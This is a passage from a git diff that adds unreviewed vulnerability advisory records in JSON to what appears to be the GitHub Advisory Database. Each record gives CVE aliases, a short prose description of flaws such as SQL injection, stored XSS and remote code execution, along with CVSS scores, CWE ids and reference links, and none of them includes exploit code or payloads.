found in SourceCodester Prison Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /Account/login.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259692.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3439" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemSQL2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259692" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259692" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312204" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7qgp-gf9r-8w4w/GHSA-7qgp-gf9r-8w4w.json b/advisories/unreviewed/2024/04/GHSA-7qgp-gf9r-8w4w/GHSA-7qgp-gf9r-8w4w.json new file mode 100644 index 00000000000..9c7181515b0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7qgp-gf9r-8w4w/GHSA-7qgp-gf9r-8w4w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qgp-gf9r-8w4w", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-20780" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20780" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7r82-4m67-jq5c/GHSA-7r82-4m67-jq5c.json b/advisories/unreviewed/2024/04/GHSA-7r82-4m67-jq5c/GHSA-7r82-4m67-jq5c.json new file mode 100644 index 00000000000..4d6acaea28c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7r82-4m67-jq5c/GHSA-7r82-4m67-jq5c.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7r82-4m67-jq5c", + "modified": "2024-04-07T06:30:30Z", + "published": "2024-04-07T06:30:30Z", + "aliases": [ + "CVE-2024-3416" + ], + "details": "A vulnerability classified as critical was found in SourceCodester Online Courseware 1.0. This vulnerability affects unknown code of the file admin/editt.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259588.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3416" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-01.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259588" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259588" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311593" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7vfh-vh8v-495r/GHSA-7vfh-vh8v-495r.json b/advisories/unreviewed/2024/04/GHSA-7vfh-vh8v-495r/GHSA-7vfh-vh8v-495r.json new file mode 100644 index 00000000000..fea5e039d8e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7vfh-vh8v-495r/GHSA-7vfh-vh8v-495r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7vfh-vh8v-495r", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28943" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28943" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28943" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7xq6-jm62-ww8g/GHSA-7xq6-jm62-ww8g.json b/advisories/unreviewed/2024/04/GHSA-7xq6-jm62-ww8g/GHSA-7xq6-jm62-ww8g.json index e54f6f80568..2fdd96242f0 100644 --- a/advisories/unreviewed/2024/04/GHSA-7xq6-jm62-ww8g/GHSA-7xq6-jm62-ww8g.json +++ b/advisories/unreviewed/2024/04/GHSA-7xq6-jm62-ww8g/GHSA-7xq6-jm62-ww8g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7xq6-jm62-ww8g", - "modified": "2024-04-03T15:30:42Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-04-03T15:30:42Z", "aliases": [ "CVE-2024-26687" @@ -30,6 +30,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/9be71aa12afa91dfe457b3fb4a444c42b1ee036b" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ea592baf9e41779fe9a0424c03dd2f324feca3b3" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/fa765c4b4aed2d64266b694520ecb025c862c5a9" diff --git a/advisories/unreviewed/2024/04/GHSA-8266-hvc3-3w4r/GHSA-8266-hvc3-3w4r.json b/advisories/unreviewed/2024/04/GHSA-8266-hvc3-3w4r/GHSA-8266-hvc3-3w4r.json new file mode 100644 index 00000000000..cc597e4c6fe --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8266-hvc3-3w4r/GHSA-8266-hvc3-3w4r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8266-hvc3-3w4r", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28934" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28934" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28934" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8289-h44w-mrcv/GHSA-8289-h44w-mrcv.json b/advisories/unreviewed/2024/04/GHSA-8289-h44w-mrcv/GHSA-8289-h44w-mrcv.json new file mode 100644 index 00000000000..051d003b179 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8289-h44w-mrcv/GHSA-8289-h44w-mrcv.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8289-h44w-mrcv", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2787" + ], + "details": "The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Page Title HTML Tag in all versions up to, and including, 3.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2787" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3064385%40happy-elementor-addons%2Ftrunk&old=3044937%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=#file13" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea3daad1-74a1-44be-b7ed-b58b806da614?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-82x8-6g4h-h5w3/GHSA-82x8-6g4h-h5w3.json b/advisories/unreviewed/2024/04/GHSA-82x8-6g4h-h5w3/GHSA-82x8-6g4h-h5w3.json new file mode 100644 index 00000000000..00a8d437b68 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-82x8-6g4h-h5w3/GHSA-82x8-6g4h-h5w3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82x8-6g4h-h5w3", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2539" + ], + "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widget '_id' attributes in all versions up to, and including, 8.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2539" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3065560/addons-for-elementor/trunk/templates/addons/marquee-text/content.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/52d79cdd-739f-4ae9-9214-bc64ca7d8ecb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T06:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8369-88r2-v5v6/GHSA-8369-88r2-v5v6.json b/advisories/unreviewed/2024/04/GHSA-8369-88r2-v5v6/GHSA-8369-88r2-v5v6.json new file mode 100644 index 00000000000..48807250001 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8369-88r2-v5v6/GHSA-8369-88r2-v5v6.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8369-88r2-v5v6", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2289" + ], + "details": "The PowerPack Lite for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link in multiple elements in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2289" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3051551" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a22c7b45-752c-482d-8812-888d5bc3d630?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-84wm-vc86-65hw/GHSA-84wm-vc86-65hw.json b/advisories/unreviewed/2024/04/GHSA-84wm-vc86-65hw/GHSA-84wm-vc86-65hw.json new file mode 100644 index 00000000000..468f5c8da7d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-84wm-vc86-65hw/GHSA-84wm-vc86-65hw.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-84wm-vc86-65hw", + "modified": "2024-04-05T18:30:34Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2024-3348" + ], + "details": "A vulnerability classified as critical has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. Affected is an unknown function of the file booking/index.php. The manipulation of the argument log_email/log_pword leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259452.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3348" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-01" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259452" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259452" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310216" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T17:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-85f3-pf99-4rpm/GHSA-85f3-pf99-4rpm.json b/advisories/unreviewed/2024/04/GHSA-85f3-pf99-4rpm/GHSA-85f3-pf99-4rpm.json new file mode 100644 index 00000000000..1870484a77f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-85f3-pf99-4rpm/GHSA-85f3-pf99-4rpm.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85f3-pf99-4rpm", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29744" + ], + "details": "In tmu_get_gov_time_windows, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29744" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-85jh-9232-5897/GHSA-85jh-9232-5897.json b/advisories/unreviewed/2024/04/GHSA-85jh-9232-5897/GHSA-85jh-9232-5897.json new file mode 100644 index 00000000000..6d8f3fd5078 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-85jh-9232-5897/GHSA-85jh-9232-5897.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85jh-9232-5897", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2125" + ], + "details": "The EnvíaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3. This is due to missing or incorrect nonce validation on the gallery_add function. This makes it possible for unauthenticated attackers to upload malicious files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2125" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/envialosimple-email-marketing-y-newsletters-gratis/trunk/api/gallery.php#L29" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2b39abc8-9281-4d58-a9ec-877c5bae805a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-85ww-p22g-3xvc/GHSA-85ww-p22g-3xvc.json b/advisories/unreviewed/2024/04/GHSA-85ww-p22g-3xvc/GHSA-85ww-p22g-3xvc.json new file mode 100644 index 00000000000..0f6c327b9b0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-85ww-p22g-3xvc/GHSA-85ww-p22g-3xvc.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85ww-p22g-3xvc", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T09:31:14Z", + "aliases": [ + "CVE-2024-23191" + ], + "details": "Upsell advertisement information of an account can be manipulated to execute script code in the context of the users browser session. To exploit this an attacker would require temporary access to a users account or an successful social engineering attack to lure users to maliciously configured accounts. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. Sanitization of user-defined upsell content has been improved. No publicly available exploits are known.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23191" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/releases/8.21" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/releases/8.22" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2024/oxas-adv-2024-0001.json" + }, + { + "type": "WEB", + "url": "https://software.open-xchange.com/products/appsuite/doc/Release_Notes_for_Patch_Release_6268_7.10.6_2024-02-08.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8673-r45m-47g8/GHSA-8673-r45m-47g8.json b/advisories/unreviewed/2024/04/GHSA-8673-r45m-47g8/GHSA-8673-r45m-47g8.json new file mode 100644 index 00000000000..bd1bf114eb5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8673-r45m-47g8/GHSA-8673-r45m-47g8.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8673-r45m-47g8", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3167" + ], + "details": "The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘twitter_username’ parameter in versions up to, and including, 2.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3167" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ocean-extra/tags/2.2.6/includes/widgets/social-share.php#L269" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3066649" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a292579c-9755-4bd4-996c-23d19ca1c197?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-86jx-wr74-xr74/GHSA-86jx-wr74-xr74.json b/advisories/unreviewed/2024/04/GHSA-86jx-wr74-xr74/GHSA-86jx-wr74-xr74.json new file mode 100644 index 00000000000..50d6bf0005e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-86jx-wr74-xr74/GHSA-86jx-wr74-xr74.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86jx-wr74-xr74", + "modified": "2024-04-09T18:30:22Z", + "published": "2024-04-09T18:30:22Z", + "aliases": [ + "CVE-2024-31866" + ], + "details": "Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.\n\nThe attackers can execute shell scripts or malicious code by overriding configuration like ZEPPELIN_INTP_CLASSPATH_OVERRIDES.\nThis issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31866" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4715" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/jpkbq3oktopt34x2n5wnhzc2r1410ddd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-116" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-86p8-qv4v-vv9r/GHSA-86p8-qv4v-vv9r.json b/advisories/unreviewed/2024/04/GHSA-86p8-qv4v-vv9r/GHSA-86p8-qv4v-vv9r.json new file mode 100644 index 00000000000..c1cb40fc5ca --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-86p8-qv4v-vv9r/GHSA-86p8-qv4v-vv9r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86p8-qv4v-vv9r", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28901" + ], + "details": "Windows Remote Access Connection Manager Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28901" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-126" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-86r8-h4wj-hhjg/GHSA-86r8-h4wj-hhjg.json b/advisories/unreviewed/2024/04/GHSA-86r8-h4wj-hhjg/GHSA-86r8-h4wj-hhjg.json new file mode 100644 index 00000000000..d13584085b7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-86r8-h4wj-hhjg/GHSA-86r8-h4wj-hhjg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86r8-h4wj-hhjg", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-48724" + ], + "details": "A memory corruption vulnerability exists in the web interface functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted HTTP POST request can lead to denial of service of the device's web interface. An attacker can send an unauthenticated HTTP POST request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48724" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1864" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1864" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8727-cvxh-wg93/GHSA-8727-cvxh-wg93.json b/advisories/unreviewed/2024/04/GHSA-8727-cvxh-wg93/GHSA-8727-cvxh-wg93.json new file mode 100644 index 00000000000..d0653141348 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8727-cvxh-wg93/GHSA-8727-cvxh-wg93.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8727-cvxh-wg93", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-0899" + ], + "details": "The s2Member – Best Membership Plugin for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 230815 via the API. This makes it possible for unauthenticated attackers to see the contents of those posts and pages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0899" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3051411%40s2member%2Ftrunk&old=3037346%40s2member%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/80bfb470-a3df-497f-940d-051ccaa6215b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-876p-p3c7-ggc7/GHSA-876p-p3c7-ggc7.json b/advisories/unreviewed/2024/04/GHSA-876p-p3c7-ggc7/GHSA-876p-p3c7-ggc7.json new file mode 100644 index 00000000000..eea81d2696e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-876p-p3c7-ggc7/GHSA-876p-p3c7-ggc7.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-876p-p3c7-ggc7", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-23085" + ], + "details": "Apfloat v1.10.1 was discovered to contain a NullPointerException via the component org.apfloat.internal.DoubleScramble::scramble(double[], int, int[]).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23085" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/a4a54fc4abe044976a66af9fffedfc94" + }, + { + "type": "WEB", + "url": "https://github.com/mtommila/apfloat" + }, + { + "type": "WEB", + "url": "http://apfloat.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-87f6-4648-854h/GHSA-87f6-4648-854h.json b/advisories/unreviewed/2024/04/GHSA-87f6-4648-854h/GHSA-87f6-4648-854h.json new file mode 100644 index 00000000000..9d7695c5931 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-87f6-4648-854h/GHSA-87f6-4648-854h.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87f6-4648-854h", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29754" + ], + "details": "In TMU_IPC_GET_TABLE, there is a possible out of bounds read due to a missing bounds check. This could 